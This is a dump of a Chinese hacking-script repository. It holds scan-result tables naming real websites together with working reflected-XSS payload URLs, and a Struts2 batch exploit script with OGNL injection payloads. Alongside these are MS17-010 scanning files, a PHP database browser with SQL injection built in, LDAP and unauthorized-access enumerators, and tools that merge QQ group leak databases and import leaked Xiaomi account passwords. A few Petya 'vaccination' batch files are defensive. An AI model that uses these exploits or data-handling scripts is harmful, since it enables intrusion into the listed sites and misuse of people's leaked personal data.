32 | http://www.shlst.cn/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://chinasolarbolt.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.11250.net/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.shanghainanke.cn/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.22266666.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://gshqdygjzx.com/ | webserver_Parsing_vulnerability.py.py | IIS7 NGINX 解析漏洞 | https://phpinfo.me | 目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.php | website |
http://www.jcjdwjy.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.jcjdwjy.com/存在dedecms swfupload反射xss,验证url:http://www.jcjdwjy.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.furuige.cn/ | Disucz3_flvplayer_swf_xss.py.py | discuz X3.0 /static/image/common/flvplayer 反射XSS | https://phpinfo.me | http://www.furuige.cn/目标存在flash反射型xss,验证地址:http://www.furuige.cn//static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(document.cookie); | website |
http://www.28zqw.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.28zqw.com/存在dedecms swfupload反射xss,验证url:http://www.28zqw.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.201552.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.201552.com/存在dedecms swfupload反射xss,验证url:http://www.201552.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
--------------------------------------------------------------------------------
/lcy/result/20160921_35187.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | LcyScan
7 |
8 |
19 |
20 |
21 |
22 |
23 | url |
24 | 存在漏洞的插件 |
25 | 插件名称 |
26 | 漏洞来源 |
27 | 执行结果 |
28 | 类型 |
29 |
30 |
31 |
32 | http://gshqdygjzx.com/ | webserver_Parsing_vulnerability.py.py | IIS7 NGINX 解析漏洞 | https://phpinfo.me | 目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.php | website |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/lcy/result/20160921_4838.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | LcyScan
7 |
8 |
19 |
20 |
21 |
22 |
23 | url |
24 | 存在漏洞的插件 |
25 | 插件名称 |
26 | 漏洞来源 |
27 | 执行结果 |
28 | 类型 |
29 |
30 |
31 |
32 |
--------------------------------------------------------------------------------
/lcy/result/20160921_74289.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | LcyScan
7 |
8 |
19 |
20 |
21 |
22 |
23 | url |
24 | 存在漏洞的插件 |
25 | 插件名称 |
26 | 漏洞来源 |
27 | 执行结果 |
28 | 类型 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/lcy/result/20160921_76544.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | LcyScan
7 |
8 |
19 |
20 |
21 |
22 |
23 | url |
24 | 存在漏洞的插件 |
25 | 插件名称 |
26 | 漏洞来源 |
27 | 执行结果 |
28 | 类型 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/lcy/result/20160921_84164.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | LcyScan
7 |
8 |
19 |
20 |
21 |
22 |
23 | url |
24 | 存在漏洞的插件 |
25 | 插件名称 |
26 | 漏洞来源 |
27 | 执行结果 |
28 | 类型 |
29 |
30 |
31 |
32 | http://www.shlst.cn/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://chinasolarbolt.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.11250.net/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.shanghainanke.cn/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
http://www.22266666.com/ | dedecms_swfupload_xss.py.py | DeDeCMS swfupload.swf反射xss | https://phpinfo.me | http://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}// | website |
--------------------------------------------------------------------------------
/ldap匿名访问检测脚本.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | # [url]http://ldap3.readthedocs.io/tutorial.html#accessing-an-ldap-server[/url]
4 | import ldap3
5 | from fileutils import FileUtils
6 | import os
7 |
8 | def verify(host):
9 |
10 | try:
11 | print host
12 | server = ldap3.Server(host, get_info=ldap3.ALL, connect_timeout=30)
13 | conn = ldap3.Connection(server, auto_bind=True)
14 | #print server
15 | if len(server.info.naming_contexts) > 0:
16 | for _ in server.info.naming_contexts:
17 | if conn.search(_, '(objectClass=inetOrgPerson)'):
18 | naming_contexts = _.encode('utf8')
19 | f = open('ldap.txt','a')
20 | f.write(host + '\n')
21 | f.close()
22 |
23 | except Exception, e:
24 | pass
25 | #print e
26 |
27 | if __name__ == '__main__':
28 | for host in FileUtils.getLines('ldap.lst'):
29 | verify(host)
--------------------------------------------------------------------------------
/ms17010/IpScanResult.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/IpScanResult.txt
--------------------------------------------------------------------------------
/ms17010/go.bat:
--------------------------------------------------------------------------------
1 | java -jar ms17010.jar
--------------------------------------------------------------------------------
/ms17010/ip.txt:
--------------------------------------------------------------------------------
1 | 10.222.22.0/24
2 | 10.222.23.0/24
3 | 10.222.12.0/24
--------------------------------------------------------------------------------
/ms17010/ms.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms.exe
--------------------------------------------------------------------------------
/ms17010/ms17010.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms17010.jar
--------------------------------------------------------------------------------
/ms17010/readme.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/readme.txt
--------------------------------------------------------------------------------
/mysql.php:
--------------------------------------------------------------------------------
1 | 所有数据库如下:";
14 | $sql1="show databases";
15 | $result1=mysql_query($sql1);
16 | while($rel1=mysql_fetch_array($result1)){
17 | echo $rel1[0]." 查看表
";
18 | }
19 | }
20 | if(!empty($_GET['db'])){
21 | $db=$_GET['db'];
22 | echo "当前数据库:".$db;
23 | echo "    返回上级
";
24 | mysql_query("use $db");
25 | $sql2="show tables";
26 | $result2=mysql_query($sql2);
27 | while($rel2=mysql_fetch_array($result2)){
28 | echo "
".$rel2[0]."   查看数据";
29 | }
30 | }
31 | if(!empty($_GET['tb2'])){
32 | $db2=$_GET['db2'];
33 | $tb2=$_GET['tb2'];
34 | echo "当前数据库:".$db2.">当前表".$tb2."
";
35 | mysql_query("use $db2");
36 | $sql4="select * from $tb2";
37 | $result4=mysql_query($sql4);
38 | $count=mysql_num_fields($result4);
39 | echo "";
40 | echo "";
41 | for($i=0;$i<$count;++$i){
42 | echo "".mysql_field_name($result4,$i)." | ";
43 | }
44 | while($rel=mysql_fetch_array($result4)){
45 | echo "
";
46 | for($i=0;$i<$count;++$i){
47 | $field_name=mysql_field_name($result4,$i);
48 | echo "".$rel[$field_name]." | ";
49 | }
50 | echo "
";
51 | }
52 | echo "";
53 | echo "
";
54 | }
55 | ?>
--------------------------------------------------------------------------------
/nopetyavac.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | REM Administrative check from here: https://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights
3 | REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224
4 | REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams
5 |
6 | echo Administrative permissions required. Detecting permissions...
7 | echo.
8 |
9 | net session >nul 2>&1
10 |
11 | if %errorLevel% == 0 (
12 | if exist C:\Windows\perfc (
13 | echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
14 | echo.
15 | ) else (
16 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
17 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
18 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat
19 |
20 | attrib +R C:\Windows\perfc
21 | attrib +R C:\Windows\perfc.dll
22 | attrib +R C:\Windows\perfc.dat
23 |
24 | echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
25 | echo.
26 | )
27 | ) else (
28 | echo Failure: You must run this batch file as Administrator.
29 | )
30 |
31 | pause
32 |
--------------------------------------------------------------------------------
/nsa应急策略.bat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/nsa应急策略.bat
--------------------------------------------------------------------------------
/petya系列勒索木马免疫脚本.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo 请以管理员权限启动该免疫脚本..
3 | echo.
4 | net session >nul 2>&1
5 |
6 | if %errorLevel% == 0 (
7 | if exist C:\Windows\perfc (
8 | echo 已经创建过*Petya免疫文件.
9 | echo.
10 | ) else (
11 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc
12 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dll
13 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dat
14 |
15 | attrib +R C:\Windows\perfc
16 | attrib +R C:\Windows\perfc.dll
17 | attrib +R C:\Windows\perfc.dat
18 |
19 | echo 免疫类型:NotPetya/Petya/Petna/SortaPetya.
20 | echo.
21 | )
22 | ) else (
23 | echo 失败:请以管理员身份运行改程序
24 | )
25 |
26 | pause
--------------------------------------------------------------------------------
/phpcms_getshell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/phpcms_getshell.exe
--------------------------------------------------------------------------------
/plink用法.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/plink用法.txt
--------------------------------------------------------------------------------
/portscan.py:
--------------------------------------------------------------------------------
1 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
2 |
3 | #+--------------------+
4 | #|Creators : |
5 | #|-Drarqua GHS Storm |
6 | #|-Rebel Yell |
7 | #+--------------------+
8 |
9 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
10 |
11 | import time
12 | import socket
13 | import os
14 | import sys
15 | import string
16 |
17 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
18 |
19 | def restart_program():
20 | python = sys.executable
21 | os.execl(python, python, * sys.argv)
22 | curdir = os.getcwd()
23 |
24 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
25 |
26 | address = raw_input( "Choose your target:" )
27 | start = input( "From port:" )
28 | stop = input( "To port:" )
29 | openportsL = []
30 | def portscan(address, port):
31 | ps = socket.socket()
32 | print ("Searching for open ports")
33 | try:
34 | ps.connect((address, port))
35 | print ("[Port %s is OPEN.]") %(port)
36 | openportsL[1:1] = [port]
37 | return True
38 | except socket.error, msg:
39 | return False
40 | s.close()
41 | print ("Port Scan Started ... It may take time")
42 | for port in range(start, stop):
43 | portscan(address, port)
44 | print ("Port Scann completed")
45 | print ("The open ports are :")
46 | print ( openportsL )
47 | if __name__ == "__main__":
48 | answer = raw_input("Do you want to Portscan again?")
49 | if answer.strip() in "y Y yes Yes YES".split():
50 | restart_program()
51 | else:
52 | os.system(curdir+"\Deq\main.py")
53 |
54 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
--------------------------------------------------------------------------------
/python二级域名批量采集脚本/getsubdomain.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python二级域名批量采集脚本/getsubdomain.pdf
--------------------------------------------------------------------------------
/python抓取谷歌链接工具/getlink.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python抓取谷歌链接工具/getlink.pdf
--------------------------------------------------------------------------------
/python抓取谷歌链接工具/getlink.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python
2 | #coding=utf-8
3 | import urllib2,urllib,threading,Queue,os
4 | import msvcrt
5 | import simplejson
6 | import sys
7 |
8 | seachstr = raw_input("Key?:")
9 | pagenum = raw_input("How many?:")
10 | pagenum = int(pagenum)/8+1
11 | line = 5
12 |
13 | class googlesearch(threading.Thread):
14 | def __init__(self):
15 | threading.Thread.__init__(self)
16 | self.urls= []
17 |
18 | def run(self):
19 | while 1:
20 | self.catchURL()
21 | queue.task_done()
22 | def catchURL(self):
23 | self.key = seachstr.decode('gbk').encode('utf-8')
24 | self.page= str(queue.get())
25 | url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(self.key),self.page)
26 | try:
27 | request = urllib2.Request(url)
28 | response = urllib2.urlopen(request)
29 | results = simplejson.load(response)
30 | URLinfo = results['responseData']['results']
31 | except Exception,e:
32 | print e
33 | else:
34 | for info in URLinfo:
35 | print info['url']
36 |
37 | class ThreadGetKey(threading.Thread):
38 | def run(self):
39 | while 1:
40 | try:
41 | chr = msvcrt.getch()
42 | if chr == 'q':
43 | print "stopped by your action ( q )"
44 | os._exit(1)
45 | else:
46 | continue
47 | except:
48 | os._exit(1)
49 |
50 | if __name__ == '__main__':
51 | pages=[]
52 | queue = Queue.Queue()
53 |
54 | for i in range(1,pagenum+1):
55 | pages.append(i)
56 |
57 | for n in pages:
58 | queue.put(n)
59 |
60 | ThreadGetKey().start()
61 |
62 | for p in range(line):
63 | googlesearch().start()
--------------------------------------------------------------------------------
/python未授权访问提取特定数据脚本.py:
--------------------------------------------------------------------------------
1 | import urllib.request
2 | import urllib.error
3 | from bs4 import BeautifulSoup
4 |
5 | x=0
6 | for i in range(1,1000):
7 | url = 'http://xxx.xxx.xxx?id='+str(i)
8 | x+=1
9 | try:
10 | html = urllib.request.urlopen(url) #定义地址
11 | soup = BeautifulSoup(html,"lxml") #使用BeautifulSoup接受url参数
12 | soup1 = soup.find(id="nsrsbh")#查找标签id值为nsrsbh
13 | nsbr = (soup1.get('value')) #获取标签内value属性的字符串
14 | print("获取到第"+str(i)+"条数据:"+nsbr)
15 | except urllib.error.URLError as e: #异常捕获
16 | if hasattr(e,"code"):
17 | print(e.code)
18 | if hasattr(e,"reason"):
19 | print(e.reason)
--------------------------------------------------------------------------------
/python版本的小葵转换工具.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python版本的小葵转换工具.py
--------------------------------------------------------------------------------
/qq.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qq.rar
--------------------------------------------------------------------------------
/qq群社工库处理.txt:
--------------------------------------------------------------------------------
1 | 为什么不花些时间都放在同一张表里,这样更方便啊
2 |
3 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group1
4 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group2
5 | .....
6 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group101
7 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group102
8 | .....
9 |
10 | 以此类推,一共1100条,编辑好后放到查询分析器执行,我电脑耗时3个小时
11 |
12 | 之后针对QQ号和群号分别建立索引
13 |
14 | USE [NewDB]
15 | GO
16 | CREATE NONCLUSTERED INDEX [IDX_QQ_NUM] ON [dbo].[Newtable]
17 | (
18 | [QQNum] ASC
19 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
20 | GO
21 |
22 |
23 |
24 | USE [NewDB]
25 | GO
26 | CREATE NONCLUSTERED INDEX [IDX_QUN_NUM] ON [dbo].[Newtable]
27 | (
28 | [QunNum] ASC
29 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
30 | GO
31 |
32 | 每个索引建立时间大约3个小时。(索引建立要放在查询分析器用命令执行,不要使用GUI,数据量太大,会提示超时)
33 |
34 | 这样弄好后就是一个库一个表,可以实现瞬间反馈查询结果了
35 |
36 | 批处理合并
37 | group合并
38 | ::合并所有表
39 | @echo off
40 | del /f /q 1.sql
41 | setlocal Enabledelayedexpansion
42 | set p=0
43 | for /l %%i in (1,1,11) do (
44 | for /l %%j in (1,1,100) do (
45 | set /a p=!p!+1
46 | echo INSERT INTO qqinfo.dbo.qqinfo^([QQNum],[Nick],[Age],[Gender],[Auth],[QunNum]^) SELECT [QQNum],[Nick] ,[Age] ,[Gender] ,[Auth],[QunNum] FROM GroupData%%i.dbo.Group!p!>>1.sql
47 | echo go>>1.sql
48 | )
49 |
50 | )
51 |
52 | osql -E -i 1.sql
53 |
54 |
55 | qunlist合并
56 |
57 | ::合并所有表
58 | @echo off
59 | del /f /q 1.sql
60 | setlocal Enabledelayedexpansion
61 | set p=0
62 | for /l %%i in (1,1,11) do (
63 | for /l %%j in (1,1,10) do (
64 | set /a p=!p!+1
65 | echo INSERT INTO qqinfo.dbo.quninfo^([QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText]^) SELECT [QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText] FROM QunInfo%%i.dbo.QunList!p!>>1.sql
66 | echo go>>1.sql
67 | )
68 |
69 | )
70 |
71 | osql -E -i 1.sql
--------------------------------------------------------------------------------
/qunlist.bat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qunlist.bat
--------------------------------------------------------------------------------
/runassystem权限小工具.bat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/runassystem权限小工具.bat
--------------------------------------------------------------------------------
/s2批量检测.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | import requests
4 | import sys
5 |
6 | def s2exp(url,types):
7 | s2_016payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
8 | s2_019payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"
9 | s2_032payload = "method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
10 | s2_devmode = "debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=88888887"
11 | if types == "032":
12 | payload = s2_032payload
13 | elif types == "016":
14 | payload = s2_016payload
15 | elif types == "s2_devmode":
16 | payload = s2_devmode
17 | else:
18 | payload = s2_019payload
19 | try:
20 | headers = {"Content-types":"application/x-www-form-urlencoded"}
21 | r = requests.post(url,data=payload,headers=headers,timeout=5)
22 | res = r.text
23 | if res.find("88888887") <> -1:
24 | f = open("result.txt","a")
25 | f.write(l.strip() + " [s2-" + types + "]\r\n\r\n")
26 | print "\n[+]%s vulnerability exits s2-%s!" % (l.strip(),types),
27 | return true
28 | else:
29 | print "\n[-]%s Not s2-%s vulnerability" % (url,types),
30 | return False
31 | except:
32 | print "\n[-]%s timeout" % url,
33 | return False
34 |
35 | if __name__ == "__main__":
36 | if len(sys.argv) < 2:
37 | print "Example: python exp.py list.txt"
38 | exit()
39 | weblist = sys.argv[1]
40 | f = open(weblist)
41 | for l in f.readlines():
42 | url = l.strip()
43 | s2exp(url,"032")
44 | s2exp(url,"016")
45 | s2exp(url,"019")
46 | s2exp(url,"s2_devmode")
--------------------------------------------------------------------------------
/sgk数据清洗/BigDupRemove.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/BigDupRemove.zip
--------------------------------------------------------------------------------
/sgk数据清洗/es_import-master/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 |
27 | # PyInstaller
28 | # Usually these files are written by a python script from a template
29 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .coverage.*
42 | .cache
43 | nosetests.xml
44 | coverage.xml
45 | *,cover
46 | .hypothesis/
47 |
48 | # Translations
49 | *.mo
50 | *.pot
51 |
52 | # Django stuff:
53 | *.log
54 | local_settings.py
55 |
56 | # Flask stuff:
57 | instance/
58 | .webassets-cache
59 |
60 | # Scrapy stuff:
61 | .scrapy
62 |
63 | # Sphinx documentation
64 | docs/_build/
65 |
66 | # PyBuilder
67 | target/
68 |
69 | # IPython Notebook
70 | .ipynb_checkpoints
71 |
72 | # pyenv
73 | .python-version
74 |
75 | # celery beat schedule file
76 | celerybeat-schedule
77 |
78 | # dotenv
79 | .env
80 |
81 | # virtualenv
82 | venv/
83 | ENV/
84 |
85 | # Spyder project settings
86 | .spyderproject
87 |
88 | # Rope project settings
89 | .ropeproject
90 |
--------------------------------------------------------------------------------
/sgk数据清洗/es_import-master/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 vermouth
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/sgk数据清洗/es_import-master/README.md:
--------------------------------------------------------------------------------
1 | # es_import
2 | 社工库信息(csv,excel,sql)导入es
3 |
--------------------------------------------------------------------------------
/sgk数据清洗/es_import-master/es_import.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | from elasticsearch import Elasticsearch
3 | from elasticsearch import helpers
4 | import csv
5 | import traceback
6 |
7 |
8 | def csv_import():
9 | try:
10 | es = Elasticsearch()
11 | actions = []
12 | i = 1
13 | with open('xiaomi_com.csv') as reader:
14 | for line in reader:
15 | action = {
16 | "_index": "xiaomi_",
17 | "_type": "xiaomi_user",
18 | "_id": i,
19 | "_source": {
20 | u"id": line[0].decode('utf8'),
21 | u"账户名": line[1].decode('utf8'),
22 | u"密码": line[2].decode('utf8'),
23 | u"email": line[3].decode('utf8'),
